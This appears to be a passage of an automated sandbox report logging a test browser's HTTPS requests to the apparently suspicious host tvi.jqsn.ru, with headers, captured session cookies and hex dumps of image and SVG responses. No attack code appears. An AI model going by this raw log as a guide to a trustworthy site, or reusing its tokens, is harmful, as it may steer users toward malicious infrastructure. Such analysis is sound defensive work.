                                                                                                                          Data Ascii: 4A>Xa/0N.&?qF#w&o"L:lcxP@e&&|Y!igac1CIte~q&62B}*VpB"'MssV%-?8yC?mz&]\VNsj`kY64Y(_ea[r1B5iuaQ+zx.<,~a
                                                                                                                          2024-04-17 00:34:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          44192.168.2.449792104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:51 UTC1452OUTGET /wxTR9F6RIuCf7a1umjv4VkTqrH2FLbbvnrKL12130 HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJ
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImJPUnlPaVpTVForUjBMMGVxWS9rUHc9PSIsInZhbHVlIjoiTjN1cWdhd0NoYWlaSTRPTnZqTU1hUXNEcXdGbisvcEVUbFcySGtsdzcvcGJnMlNLcmorTGk0V05uQmRqcUdsOHQwWlNXYjJOVGRmUDFWWTV0NVJlMDAydnUvTmFpS285R3ZZTmJPTFM5dVJHYlpaOC8zSUNRSEZGd1lDTlpBT3MiLCJtYWMiOiJlMTIwZjRlMTY2YTNhMmM1ODFlMjJlOGVkMWQxNmRhZDkxYmFhYTExZjczNzllOTljM2QwN2VjOGU5YmM1N2VjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IngvMStrOFpMeCt1dGpDcXFJV0JNTHc9PSIsInZhbHVlIjoiYWpZSUhBek5qQmI3UC8zVjN0NXhBc1J3a3BBNmJUWGFOMU5EWFYweWVSaHhkdHZlWUU0SHFKWTBwdDNvV2hXMCtab2o5QzlnWFFFdWozcXJXWmpEdGlUZnlGWkpidlRNYXRiL0xwekJsM2lFT2RWOHl4T1pVZzJ6cXFVcnd2T0kiLCJtYWMiOiI1ZWFmZDRhZTkwZGZhYjRkZDcxODFhMDkyZWVkODVlYTQ5ZDcwMDQ4Y2IwNTBiYTFhMmU5Yjk1ZTY2Njg3OGJmIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:53 UTC746INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:53 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Disposition: inline; filename="wxTR9F6RIuCf7a1umjv4VkTqrH2FLbbvnrKL12130"
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R7yzfSiUTKuX1v066GP%2BhMEvSsEw0fC2eF0ZWH%2FmipUSy1z9g%2BWw1NJGUUksgfmBEnH9C4vvUCb%2B9XxkAWY%2FPuO5Tyus%2Bzwej8OwGZHeN%2BRZPTJ9npNuesuG8fSoBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854f34f1d78cc-ATL
                                                                                                                          2024-04-17 00:34:53 UTC237INData Raw: 65 37 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 a1 49 44 41 54 48 4b ed 93 b1 0d 02 31 10 04 e7 5a a0 0c aa b8 12 a8 80 9c 2e 20 23 24 23 a5 94 2d e1 cb 20 24 24 33 b2 f4 48 1f 80 cf bc 71 80 78 a7 3e ed 78 c7 b6 d1 79 59 e7 7c 16 40 68 f8 8f 14 b9 fb 05 18 24 9d 42 2f 93 81 2a 45 63 f8 0a d8 4a ba 7d 15 d0 12 9e 0f 52 6c d0 1a 5e 04 8c e1 1b e0 0c dc 23 2d 92 0e af 66 de 36 70 f7 63 4a 69 67 66 b5 80 fd 47 80 3c 9c 21 c0 7a ce e5 3e 61 e1 2b 6a 85 84 80 d6 26 55 80 09 e4 da e5 a3 45 2f a8 b4 5f dd 60 2e 64 01 84 e6 7e 5f d1 03 bf ca 37 19 0c 18 34 60 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                          Data Ascii: e7PNGIHDRw=sRGBIDATHK1Z. #$#- $$3Hqx>xyY|@h$B/*EcJ}Rl^#-f6pcJigfG<!z>a+j&UE/_`.d~_74`IENDB`
                                                                                                                          2024-04-17 00:34:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          45192.168.2.449793172.67.130.2124433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:51 UTC1131OUTGET /mnfqLXRfQb3h8jiqIHrJocr2SvHxvsqgDjQlqSFokmcLijea1DfEXdLqvO8CSbTWvd9juv212 HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImJPUnlPaVpTVForUjBMMGVxWS9rUHc9PSIsInZhbHVlIjoiTjN1cWdhd0NoYWlaSTRPTnZqTU1hUXNEcXdGbisvcEVUbFcySGtsdzcvcGJnMlNLcmorTGk0V05uQmRqcUdsOHQwWlNXYjJOVGRmUDFWWTV0NVJlMDAydnUvTmFpS285R3ZZTmJPTFM5dVJHYlpaOC8zSUNRSEZGd1lDTlpBT3MiLCJtYWMiOiJlMTIwZjRlMTY2YTNhMmM1ODFlMjJlOGVkMWQxNmRhZDkxYmFhYTExZjczNzllOTljM2QwN2VjOGU5YmM1N2VjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IngvMStrOFpMeCt1dGpDcXFJV0JNTHc9PSIsInZhbHVlIjoiYWpZSUhBek5qQmI3UC8zVjN0NXhBc1J3a3BBNmJUWGFOMU5EWFYweWVSaHhkdHZlWUU0SHFKWTBwdDNvV2hXMCtab2o5QzlnWFFFdWozcXJXWmpEdGlUZnlGWkpidlRNYXRiL0xwekJsM2lFT2RWOHl4T1pVZzJ6cXFVcnd2T0kiLCJtYWMiOiI1ZWFmZDRhZTkwZGZhYjRkZDcxODFhMDkyZWVkODVlYTQ5ZDcwMDQ4Y2IwNTBiYTFhMmU5Yjk1ZTY2Njg3OGJmIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:53 UTC774INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:53 GMT
                                                                                                                          Content-Type: image/svg+xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Disposition: inline; filename="mnfqLXRfQb3h8jiqIHrJocr2SvHxvsqgDjQlqSFokmcLijea1DfEXdLqvO8CSbTWvd9juv212"
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oO5RXHZvyRYcFw%2BJYqfws74yornpnx4QlBrMbGXn9ksVn2MQMKZWoBATVpO%2FEUY9MAn%2BygVEKhCKouY8lkoxwQ5eIWIEZl9w6gbPFLG6s1yUVlSD8WsoDORpTI40oA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854f39d9353ba-ATL
                                                                                                                          2024-04-17 00:34:53 UTC595INData Raw: 37 34 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31
                                                                                                                          Data Ascii: 748<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1
                                                                                                                          2024-04-17 00:34:53 UTC1276INData Raw: 3d 22 4d 32 36 35 2e 38 20 31 32 31 35 2e 36 63 36 39 30 2e 32 34 36 20 30 20 31 32 34 39 2e 38 2d 34 35 35 2e 35 39 35 20 31 32 34 39 2e 38 2d 31 30 31 37 2e 36 53 39 35 36 2e 30 34 36 2d 38 31 39 2e 36 20 32 36 35 2e 38 2d 38 31 39 2e 36 2d 39 38 34 2d 33 36 34 2e 30 30 35 2d 39 38 34 20 31 39 38 2d 34 32 34 2e 34 34 35 20 31 32 31 35 2e 36 20 32 36 35 2e 38 20 31 32 31 35 2e 36 7a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 44 29 22 2f 3e 3c 2f 67 3e 3c 64 65 66 73 3e 3c 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 20 69 64 3d 22 41 22 20 63 78 3d 22 30 22 20 63 79 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73
                                                                                                                          Data Ascii: ="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="trans
                                                                                                                          2024-04-17 00:34:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          46192.168.2.449794104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:52 UTC1448OUTGET /qr6ucATmqV0pZCT5vGBmnHQQ5qeSshM667135 HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJ
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:53 UTC742INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:53 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Disposition: inline; filename="qr6ucATmqV0pZCT5vGBmnHQQ5qeSshM667135"
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=01fYa4EHQYhBfRQkDSrTPIZrz2Ky68Pe6jp5vSltuMjqIJnDrVQ96U%2B70tFaRVm4qzHuna%2FeTb%2F6H1UwH%2FVya%2FS8cgOQFHeZV7akx8mPfjzNIea7a%2Bgbpy05sNUe%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854f58dd2ad8e-ATL
                                                                                                                          2024-04-17 00:34:53 UTC627INData Raw: 32 64 37 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 02 9e 49 44 41 54 68 43 ed 97 81 51 1c 31 0c 45 8f 0e a0 83 a3 03 e8 60 a9 00 a8 20 a4 02 a0 82 90 0a a0 03 ae 83 90 0a b2 54 00 1d e4 3a 80 0e c8 7f 37 72 c6 ec dc ad e5 b5 73 77 3b 59 cf 68 18 f6 64 4b 5f 5f 92 e5 83 d9 c8 d7 c1 c8 fd 9f 4d 00 76 cd e0 c4 c0 c4 40 61 04 fe df 14 6a 9a e6 50 c1 3b 91 9c 4b 1a 09 ff b3 5e 25 ef 92 e7 b6 6d 17 85 01 4e 6e 1f c4 80 9c bf d1 c9 d7 92 79 d2 c2 6c f6 5d 40 ee 1c 7a 83 54 b2 00 58 d4 1f 65 e9 c2 ac b5 44 5a f2 24 59 1a 0b b0 12 98 e1 6f 60 e5 4c 40 60 a6 ea 72 03 30 e7 7f 99 73 38 42 64 1f fa bc 31 a6 ee 4d 87 3d c7 b5 41 e4 00 f8 61 91 27 c7 2f e5 08 11 4f 2e 81 80 05 40 34 12 6d 6b cf 92 9b
                                                                                                                          Data Ascii: 2d7PNGIHDR00WIDAThCQ1E` T:7rsw;YhdK__Mv@ajP;K^%mNnyl]@zTXeDZ$Yo`L@`r0s8Bd1M=Aa'/O.@4mk
                                                                                                                          2024-04-17 00:34:53 UTC107INData Raw: 89 7f 0e a0 1b f9 d4 30 d7 05 11 3f a2 d6 31 b9 77 00 22 26 92 b5 83 ee ce 00 38 6a c2 35 76 4f 00 3c 9d a8 4f 67 53 4d a4 6a 25 9c b9 75 06 bc 45 3d 3a 00 9b 58 4a 3d 3d f7 86 81 d1 02 28 ad a1 9d 33 30 01 28 8d c0 ae f7 4f 29 34 31 50 18 81 d1 a7 d0 1f 70 6b 51 40 66 f8 53 a2 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                          Data Ascii: 0?1w"&8j5vO<OgSMj%uE=:XJ==(30(O)41PpkQ@fSIENDB`
                                                                                                                          2024-04-17 00:34:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          47192.168.2.449795172.67.130.2124433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:52 UTC1105OUTGET /sqpKuPasEkRjZVcYlD9tzoTs6U9MaxM01XQQUbYMcX05n1w HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:53 UTC679INHTTP/1.1 404 Not Found
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:53 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gIztJXq0cARyQS1sW0d5JYKq6X15PV8iOJE9%2B5H8YVvItQpxPj4725cHGllSzE5bMaGVDQ5DvVVGTg%2F%2BColUrIV9g2WPf4pgt2I6kzMKurMI%2BgkIzKImh9TNCAgqPQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854f5cc0a457e-ATL
                                                                                                                          2024-04-17 00:34:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          48192.168.2.449796104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:52 UTC1470OUTGET /mnVEZMoPpz26As0HD4QkJNjKc65AwrKklFl1gYZXk0KqRGGuqdpbpq90150 HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJ
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:54 UTC760INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:53 GMT
                                                                                                                          Content-Type: image/svg+xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Disposition: inline; filename="mnVEZMoPpz26As0HD4QkJNjKc65AwrKklFl1gYZXk0KqRGGuqdpbpq90150"
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MaX8imibJQazZk%2B2KzrMNqWPyLpDD5rjtETcebXM0tI6adRIa1JGIwmzReEKqEOK6jteNM%2Fy7kALBADB4fbqSt2lRWuQlRfmi%2F3jdhoycroPgPoEOWIRGQST2asHZA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854f73f967bc6-ATL
                                                                                                                          2024-04-17 00:34:54 UTC277INData Raw: 31 30 65 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 36 2e 37 2c 36 2c 31 32 2c 31 31 2e 33 30 39 2c 31 31 2e 33 30 39 2c 31 32 2c 36 2c 36 2e 37 2e 36 39 31 2c 31 32 2c 30 2c 31 31 2e 33 30 39 2c 35 2e 33 2c 36 2c 30 2c 2e 36 39 31 2e 36 39 31 2c 30 2c 36 2c 35 2e 33 2c 31 31 2e 33 30 39 2c 30 2c 31 32 2c 2e 36 39 31 5a 22 20 66 69
                                                                                                                          Data Ascii: 10e<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fi
                                                                                                                          2024-04-17 00:34:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          49192.168.2.449797104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:52 UTC1461OUTGET /ijsDamms1S0iGERMnflyzrJHXLzG9i2LUxCn8wGgzh2Sw78163 HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
